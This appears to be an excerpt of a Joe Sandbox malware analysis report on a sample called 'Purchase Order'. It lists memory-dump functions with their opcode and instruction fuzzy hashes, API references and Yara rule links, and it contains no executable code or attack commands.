                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5300000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: b7566c13112d50593c56ea775b6b1228711dc9bceebc5d8a5b3da73365eb8cf2
                                                                                                            • Instruction ID: 1a5de519881317ed4d7a3b630d67f2acf160dfc2ffa0f63f199466a5330d0ab5
                                                                                                            • Opcode Fuzzy Hash: b7566c13112d50593c56ea775b6b1228711dc9bceebc5d8a5b3da73365eb8cf2
                                                                                                            • Instruction Fuzzy Hash: 661103B68003499FDB10DF9AD885BDEBBF8FB48720F20881AE559A3240C375A544CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 053036D0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0530372D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734783590.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5300000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: ccb9f6478f786965036839ef5fb8c81812f0c006407f4a90416a37b44ba0a05c
                                                                                                            • Instruction ID: 7f1011a3ecd2129d7d847044b92ab11e32849173b17d97ba291798d6134109fc
                                                                                                            • Opcode Fuzzy Hash: ccb9f6478f786965036839ef5fb8c81812f0c006407f4a90416a37b44ba0a05c
                                                                                                            • Instruction Fuzzy Hash: B31103B58003499FDB10DF9AD885BDEBBF8EB48320F20841AD558A3240C375A544CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B43EC Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Tefq
                                                                                                            • API String ID: 0-1066582953
                                                                                                            • Opcode ID: 679de12e434d6eebd866ca87a4ba8a857912cdf0fa6b5d8fe7da7c0335737b71
                                                                                                            • Instruction ID: 19de5ee79759bd2ac897ca0fd7898bcd7ca18aa256669f285399d97eac95f812
                                                                                                            • Opcode Fuzzy Hash: 679de12e434d6eebd866ca87a4ba8a857912cdf0fa6b5d8fe7da7c0335737b71
                                                                                                            • Instruction Fuzzy Hash: 9A41A075B002164FCB04DB79C8849AFBBF6EFC4310714892AE419DB391EB709D0687A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0586A2F0 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Hjq
                                                                                                            • API String ID: 0-3368716452
                                                                                                            • Opcode ID: b630cb5cd629711fd480953e844318702d84f5c1a9430ecbc2253ae7234437f4
                                                                                                            • Instruction ID: e739a217b8f9fc22c85afe085d7915c62f3d8ed1592dd0fd3ba0841090239240
                                                                                                            • Opcode Fuzzy Hash: b630cb5cd629711fd480953e844318702d84f5c1a9430ecbc2253ae7234437f4
                                                                                                            • Instruction Fuzzy Hash: A6412136B002119BC709AFBC989467F7AA7FBC4251B548426ED06DB385EE34DC4283E2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B5B80 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Hjq
                                                                                                            • API String ID: 0-3368716452
                                                                                                            • Opcode ID: fa13a2110bd42f3ecfe7d8cad04a3766ff4ad0b6ed4c0a17409bfd24a8ec76dd
                                                                                                            • Instruction ID: 9c4cf525fe42a4724365aec25d80a27432c35f80c274a8a340d555a7d092002d
                                                                                                            • Opcode Fuzzy Hash: fa13a2110bd42f3ecfe7d8cad04a3766ff4ad0b6ed4c0a17409bfd24a8ec76dd
                                                                                                            • Instruction Fuzzy Hash: 7D4105B5E04249DFCF01DFE8C9815EEBBB2FB49351F11446AE919AB340D7316A06CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B458C Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: RK
                                                                                                            • API String ID: 0-775345602
                                                                                                            • Opcode ID: 04504e991548c8552c7a99f2d559ad167d5baff604aa93be582a0923de18b1c3
                                                                                                            • Instruction ID: 005d62c532dd321e32d416a17d9a3a50ad9b9d4d426eb030567390ea719e6ffd
                                                                                                            • Opcode Fuzzy Hash: 04504e991548c8552c7a99f2d559ad167d5baff604aa93be582a0923de18b1c3
                                                                                                            • Instruction Fuzzy Hash: 7431EEB0D01218DFDB24DF9AC988BDEBBF5AB48314F64806AE408BB340C7B55845CFA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B5455 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: RK
                                                                                                            • API String ID: 0-775345602
                                                                                                            • Opcode ID: c0f7a4e825750e5480b91098ab73326e8212b91e0d916e01ec089796cab44789
                                                                                                            • Instruction ID: 5191ceeab92ca526ebe2b0a4c3e3273a99910c268137b0015cec97e0c5fb6de1
                                                                                                            • Opcode Fuzzy Hash: c0f7a4e825750e5480b91098ab73326e8212b91e0d916e01ec089796cab44789
                                                                                                            • Instruction Fuzzy Hash: 2B21DFB1D01218DFDB24DFA9C989BCEBBF5AB48314F24845AE408BB354C7B55845CFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B51D0 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Tefq
                                                                                                            • API String ID: 0-1066582953
                                                                                                            • Opcode ID: ff4e4fe07d943726a5b69ac9e623ae4853b27ec4de6cd6b1aec94584c763da7b
                                                                                                            • Instruction ID: 5db295e3293e3ea7c600ca48b3d2608f0548ee4f464adf71c99aa156db78159b
                                                                                                            • Opcode Fuzzy Hash: ff4e4fe07d943726a5b69ac9e623ae4853b27ec4de6cd6b1aec94584c763da7b
                                                                                                            • Instruction Fuzzy Hash: 17114831B0120A8BCF58EBB999015EFB7B6AFC9355B10402AD404EB344EB319E01CBE1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BA2EC Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Tefq
                                                                                                            • API String ID: 0-1066582953
                                                                                                            • Opcode ID: cff52787e2bfce4e54595589faf7d0623a07a76ebe8982a2983cb0b96b1e0c7c
                                                                                                            • Instruction ID: 8cd2755e1bc8de14c585959b6772c4039bda37dd28776ddf8749c200a7ac0c2d
                                                                                                            • Opcode Fuzzy Hash: cff52787e2bfce4e54595589faf7d0623a07a76ebe8982a2983cb0b96b1e0c7c
                                                                                                            • Instruction Fuzzy Hash: 4F218E75E002099FCB05DFE8D8849EDBBB6FB49310F10812AE919AB361D7319956CB20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BD664 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: HvT
                                                                                                            • API String ID: 0-2291375064
                                                                                                            • Opcode ID: ca5a3fd92dc783b9115e228591c629123446337c03964bb6dd18fed495fbc790
                                                                                                            • Instruction ID: 4ae5285ff5632001cfb137a1ac170bfa72138821140380fbfdc24e3b4e9acc76
                                                                                                            • Opcode Fuzzy Hash: ca5a3fd92dc783b9115e228591c629123446337c03964bb6dd18fed495fbc790
                                                                                                            • Instruction Fuzzy Hash: 59216AB4E082488FC744DFA8E54869D7BFAFB88304B009255E809AF384DB309C46DF51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BD5DD Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: HvT
                                                                                                            • API String ID: 0-2291375064
                                                                                                            • Opcode ID: 1c0fef146b30f47820f395eb330252af85b73636fcb8f3a6a2480626ba5aac6f
                                                                                                            • Instruction ID: eeb708602c2dfd16b00ed392c35f095ae437d7c90a63fa9f97d8dadf6aeb2839
                                                                                                            • Opcode Fuzzy Hash: 1c0fef146b30f47820f395eb330252af85b73636fcb8f3a6a2480626ba5aac6f
                                                                                                            • Instruction Fuzzy Hash: 9A115AB8E012598FC794DB6AE8047987BB6FB88304F0095D6980EFB244DB305D86DF61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B2978 Relevance: 1.3, Strings: 1, Instructions: 38COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Tefq
                                                                                                            • API String ID: 0-1066582953
                                                                                                            • Opcode ID: edccdee00dfcfa918d9bfc83a44752179d5d5f24b6b40a367f5ad19b14948d44
                                                                                                            • Instruction ID: 9214221fe16aa3a4dc9d96bd132d34a4b62b7e1756956e149e4273a971484c70
                                                                                                            • Opcode Fuzzy Hash: edccdee00dfcfa918d9bfc83a44752179d5d5f24b6b40a367f5ad19b14948d44
                                                                                                            • Instruction Fuzzy Hash: 9901E274E01208CFDB24DFB9D4846EEBBB2BF58301F20802AE829AB341EB305901DF10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BD6FB Relevance: 1.3, Strings: 1, Instructions: 18COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PuT
                                                                                                            • API String ID: 0-527981297
                                                                                                            • Opcode ID: 538aad5b2ddbfe9519154a1b306fce820a99c190fd137148e5a0752bd782a8ba
                                                                                                            • Instruction ID: c1ffd92c2faca3c70907fa8c35626a63279c5b7d71b1ccdc3d188bb90581ff6b
                                                                                                            • Opcode Fuzzy Hash: 538aad5b2ddbfe9519154a1b306fce820a99c190fd137148e5a0752bd782a8ba
                                                                                                            • Instruction Fuzzy Hash: 61E04FB4E04209CFC744DFEAD5845DC3BF9FB89304B105A19E40AEF244EB3098069F52
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BF8E0 Relevance: .2, Instructions: 191COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5ee5ad0f36c946c59ad7bbf8a119e5e6ae07ab4ee2ef9d950ee556d4b22eae12
                                                                                                            • Instruction ID: 4b5b96fcb5669bff3906e75ce8dff7af3485a0619b45e19ec94ec124d62dfeeb
                                                                                                            • Opcode Fuzzy Hash: 5ee5ad0f36c946c59ad7bbf8a119e5e6ae07ab4ee2ef9d950ee556d4b22eae12
                                                                                                            • Instruction Fuzzy Hash: 4D61EB75B002058BCF59EF79C8552AE7BB2AF88354F1005AED44AEB391DF319D06C7A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B04B0 Relevance: .2, Instructions: 183COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a3cc92aa6773f3e33d0f9a437d9df6ca1de1a8e2529bf30fc88022bdf935a019
                                                                                                            • Instruction ID: b5256e9fe03d6973fde4adc072ad58d0126119c800487f2853226ee418afb92f
                                                                                                            • Opcode Fuzzy Hash: a3cc92aa6773f3e33d0f9a437d9df6ca1de1a8e2529bf30fc88022bdf935a019
                                                                                                            • Instruction Fuzzy Hash: 17714F30E006098FCB15DF79D8596EEBBB1FF88341F14852AE806AB354EB74D945CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0586E450 Relevance: .2, Instructions: 168COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 30c55498faa2cc5d58778f9bc525f77308abec814a6bc8048db64dda20e1992a
                                                                                                            • Instruction ID: 6ff688b0df1ae8c42c4940adbb40d9beb9dc3df693cb98ac33988c940caeea8b
                                                                                                            • Opcode Fuzzy Hash: 30c55498faa2cc5d58778f9bc525f77308abec814a6bc8048db64dda20e1992a
                                                                                                            • Instruction Fuzzy Hash: 8C716E78A01608EFCB55DFA9D498DAEBBB6BF48614B114098F905AB361DB31EC81CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B67F0 Relevance: .2, Instructions: 164COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8af93d1ec55b95dd1707d74122402b3af73b2be9276860b5ea9a525c296388a0
                                                                                                            • Instruction ID: 2feb5f9e061eced28a85ceda2bbbe7756bd7fb26f33d8320ae1669325e11022a
                                                                                                            • Opcode Fuzzy Hash: 8af93d1ec55b95dd1707d74122402b3af73b2be9276860b5ea9a525c296388a0
                                                                                                            • Instruction Fuzzy Hash: 3F51F674D09219CFDF14CFA9C840AEEBBF6AF4A350F11952AE419AB310E7319942CF60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B7461 Relevance: .1, Instructions: 149COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 13c9c74e1a0d37a1bc0717085f46ccd769a8b33bb3b37e5a7bea96c0d4fb0045
                                                                                                            • Instruction ID: 66fe3ebf76e69d14e6f9fb37a18b9c697230044dafdc08c411019ff603228968
                                                                                                            • Opcode Fuzzy Hash: 13c9c74e1a0d37a1bc0717085f46ccd769a8b33bb3b37e5a7bea96c0d4fb0045
                                                                                                            • Instruction Fuzzy Hash: 1D51B474D09229CFDB64CF69C880BEEB7B5BF99340F1094A6D449EB601E7359A85CF20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B5B9C Relevance: .1, Instructions: 148COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f0203d6d6b55ea47ebc025584d215e4a8d77391b496e34147cb7922cd28108cd
                                                                                                            • Instruction ID: 59044e878c4da27d42820db97d372d9688202f6f3c5fc15e70e22318bf237c23
                                                                                                            • Opcode Fuzzy Hash: f0203d6d6b55ea47ebc025584d215e4a8d77391b496e34147cb7922cd28108cd
                                                                                                            • Instruction Fuzzy Hash: AD416FB1A002599FCF54DFADC8546EFBBE6EF98310F14842AE905EB340DB349901CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0586E128 Relevance: .1, Instructions: 147COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a12128ae0e12d07300402ac11bc33d47dbefe60e99ffa6dd570291cb8abf52a8
                                                                                                            • Instruction ID: 14ebb8c9917c41bb30459ab3fe6e1037a3dc9e8591b789311ddff1adfa959977
                                                                                                            • Opcode Fuzzy Hash: a12128ae0e12d07300402ac11bc33d47dbefe60e99ffa6dd570291cb8abf52a8
                                                                                                            • Instruction Fuzzy Hash: DE51B0357002048FCB19EB68D494BAE7BFAEF89300F1444A9E50AEB3A1CA75DC05CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BFC78 Relevance: .1, Instructions: 144COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7581e1c9c0d52469ae5355a39f5ffcd8d5c95dcafc815edc1b3a91c647f82a41
                                                                                                            • Instruction ID: 9018acb102a60bec1a4345b0d05781abb1da2d716e3f8b98c3c3a19c030a3cbd
                                                                                                            • Opcode Fuzzy Hash: 7581e1c9c0d52469ae5355a39f5ffcd8d5c95dcafc815edc1b3a91c647f82a41
                                                                                                            • Instruction Fuzzy Hash: DB41B771B002169FCB58EF7CC9941EE77B6AF89300B1044ABD40ADB354DA358C86C7A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B7A68 Relevance: .1, Instructions: 137COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e8e427f38b4c575400760ba2c83160e8425ebd994c120b37e1e0e9d55401eb1f
                                                                                                            • Instruction ID: 8c52e634108d6309d76abb21597fb3d94fbe21c8891393e631ba5b5f0de5d671
                                                                                                            • Opcode Fuzzy Hash: e8e427f38b4c575400760ba2c83160e8425ebd994c120b37e1e0e9d55401eb1f
                                                                                                            • Instruction Fuzzy Hash: 9A412874E09219DFCB04CFA9D8909EEBBB5FF89354F10952AE412AB750DB319942CF60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B3828 Relevance: .1, Instructions: 131COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: de7fc5e503225d65a290f4d5edb285f5f38557158c2b391ea9215a7d1e58f499
                                                                                                            • Instruction ID: a9be708e5b2d65716e831c083937c1c295097dc7e834f5040e1ab5d80f43ac18
                                                                                                            • Opcode Fuzzy Hash: de7fc5e503225d65a290f4d5edb285f5f38557158c2b391ea9215a7d1e58f499
                                                                                                            • Instruction Fuzzy Hash: D6519F75E0120C9FDB04CFA9D984AEDBBB2FF89310F10905AE805A7355DB35A946CB64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BAA40 Relevance: .1, Instructions: 126COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 110d25dfc04a5efe48dd43d1e24723eccd6eecadcc682d62150ecc05327ae25f
                                                                                                            • Instruction ID: e0d232ca53e4c2dae30ffb1157358ec0fe75a74a9ae3b928191388ea11969952
                                                                                                            • Opcode Fuzzy Hash: 110d25dfc04a5efe48dd43d1e24723eccd6eecadcc682d62150ecc05327ae25f
                                                                                                            • Instruction Fuzzy Hash: 1241F874E09208CFDB08CFAAC5546EEBBF6AB8C300F14D16AE419AB251D7355942CB74
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B3278 Relevance: .1, Instructions: 124COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 33c434ec2afc3cec2dd72da6f02ccaecd2a67cdf01fe846bf9fc929830b5a669
                                                                                                            • Instruction ID: 7168d4330063b13ac86c32df5c4d0d83e4b11bcaa317c39ac58aa82d9a4f3c84
                                                                                                            • Opcode Fuzzy Hash: 33c434ec2afc3cec2dd72da6f02ccaecd2a67cdf01fe846bf9fc929830b5a669
                                                                                                            • Instruction Fuzzy Hash: 3D4182B4909688CFC306CF69E954999BFB1EF4A201B2680D6D484DF273D7359E16C722
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0586E440 Relevance: .1, Instructions: 124COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a72bdbeb25bd76a85e19c2c3607d0a929516d03b3347c4955b40cd0358104b8f
                                                                                                            • Instruction ID: c165bf2cfcbbe2ba72c22371923d83009c310f480853c85b72880a7281d7b30a
                                                                                                            • Opcode Fuzzy Hash: a72bdbeb25bd76a85e19c2c3607d0a929516d03b3347c4955b40cd0358104b8f
                                                                                                            • Instruction Fuzzy Hash: A25183386016089FCB15DF68D498DAEBBB6FF89725B114498F906AB361DB31EC41CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B0088 Relevance: .1, Instructions: 118COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7eeeb920733ef154fe0178ca9a21ea005768e235e88a05903d690472df1fb0c7
                                                                                                            • Instruction ID: 9e7f05a31c4bf44f5b9f7f6b48a8488a0f544269e216ede91df50ea38523ad04
                                                                                                            • Opcode Fuzzy Hash: 7eeeb920733ef154fe0178ca9a21ea005768e235e88a05903d690472df1fb0c7
                                                                                                            • Instruction Fuzzy Hash: 9841B734A002298FDB58EFA8C854BDEB7B1FF89715F114059E905AB3A5DB799C01CFA0
                                                                                                            Uniqueness

